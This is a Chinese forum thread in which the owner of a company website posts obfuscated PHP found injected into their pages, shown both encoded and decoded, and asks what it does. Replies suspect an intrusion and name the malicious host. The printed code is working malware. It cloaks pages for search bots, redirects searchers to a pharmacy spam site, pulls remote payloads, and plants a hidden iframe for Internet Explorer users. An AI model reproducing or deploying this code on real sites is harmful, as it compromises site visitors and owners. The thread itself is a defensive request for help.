不知网站被置入恶意代码有没有人知道怎么解决

显示全部楼层 · 发表于 2013-9-30 23:08:14

这几天突然发现网站的页面都被插入一段代码，而且还是加密过，而且清除掉这代码后又自动生成了通过百度然后解密了，但是看不懂代码，求大神知道这恶意代码到底是要干嘛？？？有没有大神知道这是啥木马？？代码如下：

<?php eval(gzinflate(base64_decode('rRhrU9tI8jOpuv8wcWmRBEKW5QcYECS18e2mbhNyxrn7AMQlpJE9sV4ZjQ0E/N+ve0ayZcC3W3XnAmvUPdPd0+82i4jxNqQRS2lo6BFPPhS6aT7+7c2OAlYwYrXME4BSzjM+5jTPuGDpxHAkFP6ieRoIlqUE9o/DmBjanMcmQUo7DJhU+DG9Z4UoDD0A/JilTAA/tW1HC6bEIyuEInEiURJYUJHlAA6mFvn16/CPiy+j8XAw+jr8PBq+/3z598HQIq3ygJbNRUWM3tOA4LESh/IoBOdpJhHkrecRxyTlsciPC1rjHMRZQWskloTCBvJYbn8XsZiOJ1SMgywVNIX7KdmXuJlTMecpEZwlBh6QJJavqC3geDuWSv3vaCz2CsFjmkrYiZZ5ui65RxkHWRgwdk4IPE/hK8bV/j7ewPZg/5XGbsg3ou+pI6UMWraNNwgf+MGUGppI8pBxS4tZOrO0IBEsoZYW0tgTfE5L2SJgXu609WZBi2Ks20nYNXJOJ+gfsR+A8zS/TYXIj6+b182rb9fNm/2mbhEd/iV1UymTRcZbqcDSNbTIJE9PBPkaJjkgiJNSSMwZ6Tlkj5SCmUig9J4wDjzlfYYiX1nbkCjPk1ZVF5BguJOpXnbezVM8ghzUqR00cIUU2TyYrnHSqnIDkas1RS3KpTtkOVotsvS7MprwE91xJvASuVUzN4gGeiCRdDFEVgIskcFjZTjYprxJcV8qKwRbnK+UtDwM74F5vmYJb8fKlV7zBFbcZsIo7Tz3vXfghCKLszvKDW18ORj+azC80n8fjb6Mv8Lb+P1vg88j/WZlS1R+7rHcjTNIEOsTw8Gni9Fg/P7DhyHsNk8dEzfuex233+n3Dt1+70SqU+MF3Mrn3H8w1He71+53O/1+t23JZfeo1XFNSyFbzlHf6bq9w7Yllz3nqLdGtlw40XWdlqWWfWC2Qrqw3+25Tt+Sy47b7TumVVqrZN0FVKfVAepyedhx20dr6q12/8gBmpZadh13zdrt9A+dLgAtuTxsdVvrk0Co70qyatnt9nrPWXeOWq1D+AfWuDxyXadXEXD7QO7QbYNKcOm2D4+OemU8QXqgEMpgdtCkXxCNmwR9E7R95mn8yrkhu7sYgfkpvrZuTLJKUXO6CkmwvfkcroFrrK2jT7JsElOA6ZZ+C+VArYp4znN4JkWqAN8pXdACFoJmiQ/PgPt3MeW4N2chLJ4LLtmg6LdSdPDAPMOc6lsIeluF8gu5tan3DiJhmhXi9sEPQ77V/8rtt763cRclNnw/+NMs01dOrUGJWIsHx6R0003xoCwhaLt45fuqurwWfiqpVvEX1bTdBBRI1lz4XC5ROFJ+VrKVe0efvmCmHQ3K56cvHz4OdVNKvZD1ltQ+WBA1LGSgO5ouDNgCe4D51Y2nCcw71c7a8tWqXjwUMhUJmuRjuIe+JvQcZZh1wmqPbqty9crFUBUofWTWhN/RhKxEERQhVX+4n4aGWVfNy7wsIlBJmZlXu3Y2M/AaXlUGEW3Cq8wc1aGbqnrV4s8NXlBOo8reHMV8LeE2ZMIdDqDJGQwblf9C4X0ejWUorlzY0v1iht9Z/CLM8DjqFH215sfcQpANxgBf/h9cmRXzlP0AzYG1q54m97ZEpLpQeBt5cv9mVxH6UDj1xH7Q1z1DKe2qrL1WB4GcaVrA1SRQ/5W0pCzI0umj3Ku8AvaCltAronwui2hu1bqy3Naf9OeVWlXk57rZZvmdFxqa+gs6ow+V9dNZzZwB82OGWTNgOUc7At+EwTNkUTwPfMxS0KL7haAckii+AThL/Z+Z9IJozkHORKFmfuJPOObe2C/YPT7pggkJAeo5BW6Yjlkc0tQHTWK29kM/LteQc9aIBStp/WRiyrOk9Ctt9hed114jhoN/fh1cjsZfhx8rp845S8UYTvPK1GTlmTOrUUAP9Uv7fWOVZp+ealiWQt+9gV657rqnXwcAKhwDIDVr7j+zEPDivJaeyODd5vrSbXF2qCVxdQKa5yjifkIBq58W4iGmZ292bPEjXCTkkQBThh5x7N8WWTwX9ITENBLHB73OYX5/QmDoOT44bDu4Xr45bZYETkO2IAGYs/AaklQDYEzxKXjgNWTr3Wwmd/Th7sdiIvIf9u0D6JZyO6Wi+f3HnPKHJgSMnU/z8wXlngLZMURbIezvRYPcsVBMvUbb6TfIlLLJVHgN6FoaZ6dNxQp4NkGQM5m3tSCDnhqyJV70T9inQXOSBltZ6+VciR3of+k6JVfoWL1a5yphM28jvhDWbB6oD+KxRQApn48rd4/t5bUNUwoOKdsb398vLrHllWSxvEjTQ1NVzWtI3TxtOQ4CJY/EFzBCAIcr/+Cnc9C/PrjZv7YNfLt5dK3u8qlaogDr9ZO9d23TcG5qODopwmW2yH0+gSsU81tguzl4ER3mLaRRDVy1q9z6Be11xjRFYxmYXSVVW4eOAj6WY7XLeM79CWUhsDBYAbM3KOG3wehK8oW7n9df91rHjjrE5xwn01d1V4v2+sCwqjtwFPqbc92EZO2s47qEszSk99Jh1AZTtrGlkGcwvVd5HXpXcAXE1uprNYbJ9GJAGAac5eIszIJ5AsXCjrPAxyj0jCpw8qnPk2Ka5TnUU/RZ3YbkcG5gZfJ5MLWnIonPwb2gbdFmOFKZtt4wTyBCFW19Y15UjJ/N2jhp/1mg8nCCUYoXlbefetJgu1BK1eV3c9+TZmhYPWfP7VgqcZXcoTUrg0IJgvlU6dTzoGvCUXv1tlKxrpQLaqx+nPn/i18KvTvxWn9F8GU9hGUQq+CTxt7drZl6dxfMIaWeUh/GC0P/ozTuMdlm29dterKWYVkxJGv32ojsf4PysrtChimMTi/wny4/Dp4ucsr9+pYXfVLZnuDFqqj79eLiHx8HV/p4PBdJxDHxkJqvV0nXrDv4quZUylz9nLHVkCtCVqtb2eAdSBBk2YxBdqzYW7LHhonacWBcVj/T7B/1Oo6z13YgTvUNmy3/Aw==')));?>

复制代码

然后解密后是如下内容：

<?php if (!defined('frmDs')){
define('frmDs' ,1);
error_reporting(0);
function frm_dl ($url) {
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$out = curl_exec ($ch);
if (curl_errno($ch) !== 0) $out = false;
curl_close ($ch);
} else {$out = @file_get_contents($url);}
return trim($out);
}
function frm_crpt($in){
$il=strlen($in);$o='';
for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
return $o;
}
function frm_getcache($tmpdir,$link,$cmtime,$del=true){
$f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
if(!file_exists($f) || time() - filemtime($f) > 60 * $cmtime)
{
$dlc=frm_dl($link);
if($dlc===false){
if(del)
@unlink($f);
else
@touch($f);
}
else
{
if($fp = @fopen($f,'w')){
fwrite($fp, frm_crpt($dlc)); fclose($fp);
}else{return $dlc;}
}
}
$fc = @file_get_contents($f);
return ($fc)?frm_crpt($fc):'';
}
function frm_isbot(){
$ua=@strtolower($_SERVER['HTTP_USER_AGENT']);
if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296;
$rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),
array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),
array(3481178113,3481182206),array(2915172353,2915237886));
foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
if(!$ua)return true;
$bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');
foreach ($bots as $b) if(strpos($ua, $b)!==false) return true;
$h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);
$hba=array('google','msn','yahoo');
if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true;
return false;
}
function frm_tmpdir(){
$fs = array('/tmp','/var/tmp');
foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
if ($t = getenv($v)) {$fs[]=$t;}
}
if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
$fs[]='.';
foreach ($fs as $f){
$tf = $f.'/'.md5(rand());
if($fp = @fopen($tf, 'w')){
fclose($fp);
unlink($tf);
return $f;
}
}
return false;
}
function frm_seref(){
$r = @strtolower($_SERVER["HTTP_REFERER"]);
$ses = array('google','bing','yahoo','ask','aol');
foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
return false;
}
function frm_isuniq($tdir){
$ip=$_SERVER['REMOTE_ADDR'];
$dbf=$tdir.'/sess_'.md5(date('m.y'));
if(strpos(frm_crpt(@file_get_contents($dbf)),$ip) === false ){
if ($fp=@fopen($dbf,'a')){fputs($fp,frm_crpt($ip.'|')); fclose($fp);}
return true;
}
return false;
}
function frm_havekey(){
$nks = array('cialis','cipro','clomi','diflucan','finasteride','fluconazole','furosemide','kamagra','lasix','levitra','propecia','sildenafil','tadalafil','vardenafil','viagra','zithrom');
$k = @strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]);
print_r($r);
if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return false;
foreach ($nks as $n)if(strpos($k, $n)!==false) return $n;
return false;
}
$tdir = frm_tmpdir();
$defframe = '<style>
.tqdvm { position:absolute; left:-647px; top:-730px; }
</style>
<div class="tqdvm">
<iframe src="http://mweywqvgtpq.byinter.net/jquery/get.php?ver=jquery.latest.js" width="309" height="473"></iframe>
</div>';
$codelink = 'http://mweywqvgtpq.byinter.net/nc/gnc.php?ver=jquery.latest.js';
$ua=$_SERVER['HTTP_USER_AGENT'];
$isb=frm_isbot();
$k=frm_havekey();
//-------
$host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));
if($tdir && strlen($host)<100 && preg_match('/^[a-z0-9\-]+\.([a-z]{2,5}|[a-z]{2,3}\.[a-z]{2,3}|.*\.edu)$/', $host)){
$parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p')))),0,3);
$pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;
$ruri = strtolower($_SERVER['REQUEST_URI']);
if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){
if(!$isb && frm_seref()){
print('<script>document.location=("http://pharmshopping.net'.($k?('/search.html?key='.$k):'').'");</script>');
}
print(frm_getcache($tdir,"http://mweywqvgtpq.byinter.net/rdg/getpage.php?h=$host&p=$pageid&pa=$parg",60*24,false));
exit();
}
if (($ruri=='/' || $ruri=='/index.php') && $isb) {
print(frm_getcache($tdir,"http://mweywqvgtpq.byinter.net/rdg/getpage.php?h=$host&pa=$parg&g=1",60*24,false));
exit();
}
}
//---------
if(!$isb&&frm_seref()&&$k){
header('Location: http://pharmshopping.net/search.html?key='.$k);exit();
}
if (!$isb && preg_match('/Windows/', $ua) && preg_match('/MSIE|Opera/', $ua) && frm_isuniq($tdir) ){
if(!isset($_COOKIE['__utmfr'])) {
if(!$codelink)
print($defframe);
else
print(frm_getcache($tdir,$codelink,15));
@setcookie('__utmfr',rand(1,1000),time()+86400*30,'/');
}
}
}?>

复制代码

求解有没有人知道这病毒是要干嘛。

显示全部楼层 · 发表于 2013-9-30 23:35:00

你自己的网站的网页？

显示全部楼层 · 发表于 2013-10-1 08:59:14

@蓝核

显示全部楼层 · 发表于 2013-10-1 10:08:15

本帖最后由蓝核于 2013-10-1 10:15 编辑

话说我很好奇楼主是用什么解密工具的，如果你删除了还有
我猜有2个可能
1 你放置网页代码的机器还有病毒，全盘查杀，打好补丁

2 你网站的漏洞还有，没补上，去打打补丁花花钱吧

还有，这个玩意是毒网

http://mweywqvgtpq.byinter.net

复制代码

至于要干嘛……我看不出来额……看来我要花时间多学点东西了

显示全部楼层 · 发表于 2013-10-1 10:15:56

熊猫パンダ发表于 2013-10-1 08:59
@蓝核

已回复，不过我要多学点东西了

显示全部楼层 · 发表于 2013-10-5 22:49:47

蓝核发表于 2013-10-1 10:08
话说我很好奇楼主是用什么解密工具的，如果你删除了还有
我猜有2个可能
1 你放置网页代码的机器还有病毒， ...

首先感谢你的回答。

1.我是在http://decode.cnxct.com/这里解密的。
2.因为服务器是linux的，不好排查是不是还有病毒，所以现在就想知道这网马到底要干嘛。

显示全部楼层 · 发表于 2013-10-5 22:51:08

ccddqq 发表于 2013-9-30 23:35
你自己的网站的网页？

谢谢回答~~是公司的网站

显示全部楼层 · 发表于 2013-10-6 20:42:47

jackwzj 发表于 2013-10-5 22:51
谢谢回答~~是公司的网站

应该被入侵了，检查一下服务器，网马能干的事其实很简单，一般都是下载真正的木马到浏览被挂马的页面的用户电脑里

显示全部楼层 · 发表于 2013-10-7 20:13:59

360极速直接报毒

[未鉴定] 不知网站被置入恶意代码有没有人知道怎么解决

评分